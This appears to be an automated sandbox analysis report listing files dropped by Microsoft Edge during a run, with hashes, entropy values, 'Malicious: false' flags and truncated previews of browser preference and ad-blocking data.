Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13376815772828130","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"3004d733-dc6a-4114-a54a-8a1908d80e35"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1732342177"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\7e1f2bb5-4691-4ac8-8521-12393b7babc7.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	46383
Entropy (8bit):	6.086531131434262
Encrypted:	false
SSDEEP:	768:SMkbJrT8IeQc5dKG5dMi1zNts5rEe9eQEUBY65Dk+bCiofJDSgzMMd6qD47u30+:SMk1rT8H1KG+YeDY65bFoftSmd6qE7w
MD5:	B870D701CA4F57C22FC4FA23DE48AE88
SHA1:	46FE2D647E26F3DF8DD3E53183018FCE8687286D
SHA-256:	CF8B72EA940955554F8617A456A3C5CD04A218872D4DAB93E4FC60279D82C710
SHA-512:	E2737F3572BDCAB652C2E6C9D46C443386B8B3075C64419C4519622996A881AD0A128947826E5363AB348CE6DEE367B74EAE82EE3DD026DEE32A16CA94E4A62B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13376815772828130","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"3004d733-dc6a-4114-a54a-8a1908d80e35"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1732342177"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\bf41ea66-a520-456c-857e-531fafe195bf.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.64013246649014
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P78:fwUQC5VwBIiElEd2K57P78
MD5:	10101225085294C4AA9050CEF19E599D
SHA1:	D1E683B46B7E0B1C4DE538392F7ACB4DF6280404
SHA-256:	6F703C25109774C2D844787790FFA45183787FBFA140A5AEAD247638E0987C21
SHA-512:	A8C5867A96AD36813905AD2C01D5C18CBB82D3F1F91DFCE64E48D60EED226F1F16DBD5F3B8FC9DF065D0C641A3245EC6E59556EE4B2C219852B0C43584D334F4
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.64013246649014
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P78:fwUQC5VwBIiElEd2K57P78
MD5:	10101225085294C4AA9050CEF19E599D
SHA1:	D1E683B46B7E0B1C4DE538392F7ACB4DF6280404
SHA-256:	6F703C25109774C2D844787790FFA45183787FBFA140A5AEAD247638E0987C21
SHA-512:	A8C5867A96AD36813905AD2C01D5C18CBB82D3F1F91DFCE64E48D60EED226F1F16DBD5F3B8FC9DF065D0C641A3245EC6E59556EE4B2C219852B0C43584D334F4
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6741719B-1FDC.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.4593035837237164
Encrypted:	false
SSDEEP:	6144:1s4XsoqrBkcfB8UqSAPKpHq0WxkaHuDWG:WkcmUpI
MD5:	B7E2A19CEFD1D596D2E65C007D1F0DD0
SHA1:	15E30F28C5C299AADBDE36A6DF03F264807C7BCE
SHA-256:	BEFE530615F60C2E2B6A2069F3028EC7012231B4E6677E68D3B67843A223801E
SHA-512:	B47B4133D9F579EB43EE337E3764686A5703356827DE531D0D0990053C1C4A8DD3966402F73D94694ACF2E7622A8BE9686BC6D1DAC0CA4D70551321DD8293DC0
Malicious:	false
Preview:	...@..@...@.....C.].....@................... ...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".ehijqc20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..U?:K...G...W6.>.........."....."...24.."."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.0984945491284295
Encrypted:	false
SSDEEP:	3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHCll:o1cUh4Y3LbO/BVsJDbYuDRBOycd
MD5:	AFAC5E4CC1213807ACB7D1A0F61BCF99
SHA1:	FEDCA0A829A0DBCCD1E9D7048398372FF9604783
SHA-256:	FF48F538CBF3D665C9B115D6F3F6459E0CD7D9DF368E921E5A4BF2CA88E3C55F
SHA-512:	44F1A7E8C8DD1D5CE625AE26ED4074900A979ACD34BAFB3D3B354145690D37D34E07F2D0D9DEE81BE80EAFA9E3973AB11AD6E85EB23A804958584D8DB4902D66
Malicious:	false
Preview:	sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\10503a72-a0e6-48f7-bf96-0c95f78b891c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17544), with no line terminators
Category:	dropped
Size (bytes):	17546
Entropy (8bit):	5.483652925014672
Encrypted:	false
SSDEEP:	192:stwJ99QTryDiuabatSuypBsPuBaFvrEUJikkDZNv9/5KsYiam7tTkc8JbV+FEpQI:stwPGQSu4BsPuBCD5KYVizkbGmQwx3P
MD5:	7B7DA894D98A671FC4ED4499D5E7B5FE
SHA1:	2CFF635549269BDF0BCA27E0752AD395B7A29C30
SHA-256:	8E77DDEC22B1DE8382143A92F7A43F624E1B1D88823840C6C60E8273C4223299
SHA-512:	E3102F0076A6AAB660567E9FEFBC51F508DDE9A510E4AE53A37D3BA803AE5E8DFDBC42190999386FFC978BD7293F1F0C1639EC57BB1759A4EB438E598B09494E
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376815772774198","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\370dca46-4895-4c1e-87d4-1605288c47e8.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3c8aac55-256e-4169-ba62-c18bd8e216ae.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40504
Entropy (8bit):	5.561120728338859
Encrypted:	false
SSDEEP:	768:frnMVWWNc7pLGLPVzW5w3vf4fd8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPOXWlInEA:fb0WyAcPVzWa3vfYdu1ja3XW4p69bxYb
MD5:	2A2DB0E2D3FFDE6BEA6FB17889D0CA26
SHA1:	1099BC439E51E175CD6195EF2EB56C083AE43A75
SHA-256:	648F116BF8A24C556CE095E75D62A029D796716BEC9D54EA0267BB9C50A13E29
SHA-512:	4A8BC2B4FC5B74D2F46EF9EA6BDA67BD7CC919E90B241F46866FA06A6E0A7318879046D6CD8E013ED5282186ACDFBCF79C4E06CD9E69971B3CB394BF6BD0E520
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376815771478844","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376815771478844","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\6161755c-6b9c-4e26-becf-8feba69546e4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\6bee8682-8400-47a6-b95e-706aff2c0cf3.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\71c0d66c-175a-4e81-8378-21615a44ae2f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25012
Entropy (8bit):	5.566956313560598
Encrypted:	false
SSDEEP:	768:frqMzWWPzW5w3vf4Wd8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP1lInEbJrwXOJppt2:fu6WizWa3vfrdu1jao4G6ept2
MD5:	7A5E5A879B90D051E034CC04723B296B
SHA1:	1165750789C1AC954F5C4AEF749FD0BBAB9A3781
SHA-256:	0897C79A951F787E4FE08826458099A98FCA30AA30B3280BF4BFE4BB363091C8
SHA-512:	8963D746FA35E0CF8779AC1EA5D1DD8B180E3603B01DF88D9947060367495FEB10A7A768CEE9C608B88CFC8787913186C6F9F3ACE0B500EE4085D38053FDEC57
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376815771478844","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376815771478844","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\73b3df05-73fb-4385-b42b-6904f2394794.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	14437
Entropy (8bit):	5.3039325482205015
Encrypted:	false
SSDEEP:	192:stwJ99QTryDiuabatSuypBsPuBaFvrEUJikkDZNv9oc8JbV+FEpQwXnUvOiPgYJ:stwPGQSu4BsPuBCD5tbGmQwEP
MD5:	DF5D59CC18B4AD81654A7F97188C6E60
SHA1:	5E7DA66167B2218636608F4D40CADD3ABB2480D9
SHA-256:	C744D537C5E69EB4C46F23B49FDC9236E33A715106CD926BC1EEED2CB67281A6
SHA-512:	25114C9908FFBC5338102BAA270D9F1A6D75E2582236F340AA4C6855EAB096FC999FFEEFE440F4A42296FAEE0658D6B46E7C7493CC04FB424AAEBDF582C9FE7F
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376815772774198","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\99d540c7-df4b-485c-8ebf-c0627fb5627c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17545), with no line terminators
Category:	dropped
Size (bytes):	17547
Entropy (8bit):	5.483685031464907
Encrypted:	false
SSDEEP:	192:stwJ99QTryDiuabatSuypBsPuBaFvrEUJikkDZNv9/5KsYiam7tTkc8JbV+FEpQJ:stwPGQSu4BsPuBCD5KYVizkbGmQwo3P
MD5:	2C0E9EDB29ECCFDA1A7F75375D67E1AD
SHA1:	F31A73CA1B7A973CFDA9A34C14E9520761A04273
SHA-256:	F1C82B12FD2B6B3AAF30E4C9C002554472BBEE3EC442B9F1EB806C2E1C33E04B
SHA-512:	73A15031B39AA0EAA127A160AAD239E301992CCEE6EE0A7D2FF8673E26F0CB7AE2A81E4454127456F45FB8478ED02539D38BA0703CD6786DE5BEDA225A0891E4
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376815772774198","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9c88a6d6-6656-4575-ac6a-a8da3a5ebb13.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9861
Entropy (8bit):	5.1100377054653405
Encrypted:	false
SSDEEP:	192:stwkdpBsPuBaFvrE9kDKqc8JbV+FEpQAnUvOiPgYJ:stwQBsPuBCDBbGmQ5P
MD5:	7443935C83C78EB352AE178E583570C9
SHA1:	B69DB373B955B356017836F9BDAAC3794439F1F8
SHA-256:	DD7D45DA05FFE9067173261615E6C4159C19FF25BC6784C9C91A4212282E5700
SHA-512:	906245D333B5C77CA207EC8DC6F801AFB08CB510577C181745DEE5B8D15E819002502761E5C2C826FBC50A85A3CE30331F49DB2ABEE547E7F38A4B305784512A
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376815772774198","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	3.5394429593752084
Encrypted:	false
SSDEEP:	3:iWstvhYNrkUn:iptAd
MD5:	F27314DD366903BBC6141EAE524B0FDE
SHA1:	4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
SHA-256:	68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
SHA-512:	07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
Malicious:	false
Preview:	...m.................DB_VERSION.1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	313
Entropy (8bit):	5.252659375109594
Encrypted:	false
